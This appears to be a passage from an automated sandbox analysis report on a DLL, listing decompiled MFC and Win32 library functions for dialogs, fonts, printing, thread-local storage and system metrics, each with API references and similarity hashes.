0x100112d3

APIs

__EH_prolog3_catch.LIBCMT ref: 1001124C
GetPropA.USER32 ref: 1001125B
CallWindowProcA.USER32 ref: 100112B5

Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138

SetWindowLongA.USER32 ref: 100112DC
RemovePropA.USER32 ref: 100112E4
GlobalFindAtomA.KERNEL32 ref: 100112EB
GlobalDeleteAtom.KERNEL32 ref: 100112F2

Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871

CallWindowProcA.USER32 ref: 10011346

Strings

AfxOldWndProc423, xrefs: 10011254, 10011259, 100112E2, 100112EA

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C984, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E10017BF4(E1002800E, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E10017C60(_t65);
					}
					E10009E23(_t132 - 0x1c, E10013479());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1005aa84; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E100115DC(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000FC04(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E100146C9(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

0x1000c984
0x1000c984
0x1000c984
0x1000c984
0x1000c98b
0x1000c990
0x1000c992
0x1000c997
0x1000c99a
0x1000c9a4
0x1000c9a4
0x1000c9ac
0x1000c9b1
0x1000c9b4
0x1000c9b7
0x1000c9ba
0x1000c9c4
0x1000c9cb
0x1000c9f8
0x1000c9fb
0x1000c9fb
0x1000c9fd
0x1000c9df
0x1000c9df
0x1000cb6c
0x1000cb71
0x1000cb71
0x1000ca08
0x1000ca16
0x1000ca1a
0x1000ca27
0x1000ca2c
0x1000ca32
0x1000ca34
0x1000ca6a
0x1000ca6a
0x1000ca6c
0x1000caad
0x1000caad
0x1000cab1
0x1000cab6
0x1000cabb
0x1000cabe
0x1000cac0
0x1000cac6
0x1000cac2
0x1000cac2
0x1000cac2
0x1000cae0
0x1000cae2
0x1000cae7
0x1000cb09
0x1000cb0c
0x1000cb0e
0x1000cb16
0x1000cb19
0x1000cb1b
0x1000cb22
0x1000cb22
0x1000cb1b
0x1000cb28
0x1000cb2d
0x1000cb2f
0x1000cb35
0x1000cb35
0x1000cb3b
0x1000cb3d
0x1000cb3f
0x1000cb43
0x1000cb46
0x1000cb4c
0x1000cb4c
0x1000cb4c
0x1000cb43
0x1000cb4e
0x1000cb51
0x1000cb56
0x1000cb5f
0x1000cb5f
0x1000cb67
0x1000cb69
0x1000cb69
0x1000cb69
0x00000000
0x1000cb69
0x1000ca6e
0x1000ca72
0x1000ca7d
0x1000ca81
0x1000ca91
0x1000ca94
0x1000ca98
0x1000ca9d
0x1000caa0
0x1000caab
0x1000caab
0x00000000
0x1000caa0
0x1000ca36
0x1000ca38
0x00000000
0x00000000
0x1000ca42
0x1000ca44
0x00000000
0x00000000
0x1000ca4e
0x1000ca55
0x1000ca5a
0x1000ca5c
0x1000ca5e
0x00000000
0x00000000
0x1000ca60
0x1000ca65
0x1000ca67
0x1000ca67
0x00000000
0x1000ca65
0x1000c9d2
0x1000c9dd
0x1000c9f4
0x00000000
0x1000c9f4
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C98B
GetSystemMetrics.USER32 ref: 1000CA3C
GlobalLock.KERNEL32 ref: 1000CAA5
CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4

Strings

MS Shell Dlg, xrefs: 1000CA46

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100149BE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100149BE(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10057a08; // 0x3643b451
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x100149c4
0x100149cb
0x100149d0
0x100149d9
0x100149dc
0x100149df
0x100149e4
0x100149e8
0x100149f2
0x10014a01
0x10014a05
0x10014a12
0x10014a14
0x10014a16
0x10014a16
0x10014a31
0x10014a34
0x10014a34
0x10014a3a
0x10014a3a
0x10014a40
0x10014a42
0x10014a42
0x10014a5d
0x10014a5d
0x100149ec
0x100149f0
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 100149E4
GetStockObject.GDI32(0000000D), ref: 100149EC
GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
GetDC.USER32(00000000), ref: 10014A08
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
ReleaseDC.USER32 ref: 10014A34

Strings

System, xrefs: 100149DF, 10014A49

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10009360, Relevance: 13.6, APIs: 9, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10009360(intOrPtr __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t38;
				long _t49;
				intOrPtr _t50;
				void* _t60;
				long _t76;
				void* _t84;
				void* _t85;

				_v32 = __ecx;
				if(_a4 == 8) {
					return E100090F0(_t60, _v32, _t84, _t85);
				}
				if(_a4 == 9) {
					_t38 =  *0x10058ece & 0x000000ff;
					if(_t38 != 0) {
						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
						_v12 = _v32 + 0x74;
						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
						if(0 == 0) {
							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
						}
						_t76 =  *0x10058f0c; // 0x1005aa2c
						_v16 = _t76;
						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
						if(_v8 > 0x1000) {
							_t50 =  *0x10058f0c; // 0x1005aa2c
							_t21 = _t50 - 0xc; // 0x0
							_v20 =  *_t21;
							_v24 = _v32 + 0x74;
							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
							if(0 == 0) {
								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
							}
							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
						}
						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
						 *0x10058ece = 0;
						return _t49;
					}
				}
				return _t38;
			}

0x10009366
0x1000936d
0x00000000
0x10009372
0x10009380
0x10009386
0x1000938f
0x100093ab
0x100093b4
0x100093cb
0x100093d3
0x100093e5
0x100093e5
0x100093eb
0x100093f1
0x10009409
0x10009416
0x10009418
0x1000941d
0x10009420
0x10009429
0x1000943e
0x10009446
0x10009458
0x10009458
0x10009474
0x10009474
0x10009493
0x100094ab
0x100094b1
0x00000000
0x100094b1
0x1000938f
0x100094bb

APIs

SendMessageA.USER32 ref: 100093A5
SendMessageA.USER32 ref: 100093CB
SendMessageA.USER32 ref: 100093E5
SendMessageA.USER32 ref: 10009409
SendMessageA.USER32 ref: 1000943E
SendMessageA.USER32 ref: 10009458
SendMessageA.USER32 ref: 10009474
SendMessageA.USER32 ref: 1000948D
SendMessageA.USER32 ref: 100094AB

Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C4D, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10017BF4(E10028893, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10013965(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1002b1d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10013A82( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10017C60(_t36);
			}

0x10013c4d
0x10013c54
0x10013c59
0x10013c5b
0x10013c5e
0x10013c62
0x10013c65
0x10013c6b
0x10013c72
0x10013d73
0x10013c81
0x10013c89
0x10013c8d
0x10013cc1
0x10013cc4
0x10013cc9
0x10013ccb
0x10013cd7
0x10013cd7
0x10013ccd
0x10013ccd
0x10013cd3
0x10013cd3
0x10013cd9
0x10013cde
0x10013ce1
0x10013ce4
0x10013ce7
0x00000000
0x10013c8f
0x10013c8f
0x10013c95
0x10013ca4
0x10013ca4
0x10013ca7
0x10013d0b
0x10013d11
0x10013d16
0x10013ca9
0x10013cae
0x10013cb4
0x10013cb7
0x10013cb7
0x10013d1c
0x10013d1e
0x10013d23
0x10013d29
0x10013d29
0x10013d31
0x10013d42
0x10013d4e
0x10013d53
0x10013d59
0x10013d59
0x10013c95
0x10013d5c
0x10013d61
0x10013d6b
0x10013d6b
0x10013d6e
0x10013d6e
0x10013d74
0x10013d7f

APIs

__EH_prolog3_catch.LIBCMT ref: 10013C54
EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6E3, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000A6E3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10014056(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10014056( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1000a6e6
0x1000a6e8
0x1000a6ea
0x1000a6f2
0x1000a70c
0x1000a714
0x1000a71e
0x1000a725
0x1000a727
0x1000a72c
0x1000a72f
0x1000a72f
0x1000a746
0x1000a74d
0x1000a765
0x1000a76a
0x1000a76f
0x1000a76f
0x1000a775
0x1000a775
0x1000a725
0x1000a77a
0x1000a77e

APIs

GlobalLock.KERNEL32 ref: 1000A700
lstrcmpA.KERNEL32(?,?), ref: 1000A70C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
GlobalLock.KERNEL32 ref: 1000A750
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775

Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10013854, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013854(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1005aa30 = GetSystemMetrics(2) + 1;
				 *0x1005aa34 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x1001385f
0x10013865
0x1001386c
0x10013874
0x1001387e
0x1001388f
0x10013899
0x100138a1
0x100138ad

APIs

GetSystemMetrics.USER32 ref: 10013861
GetSystemMetrics.USER32 ref: 10013868
GetSystemMetrics.USER32 ref: 1001386F
GetSystemMetrics.USER32 ref: 10013879
GetDC.USER32(00000000), ref: 10013883
GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
ReleaseDC.USER32 ref: 100138A4

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50

Uniqueness

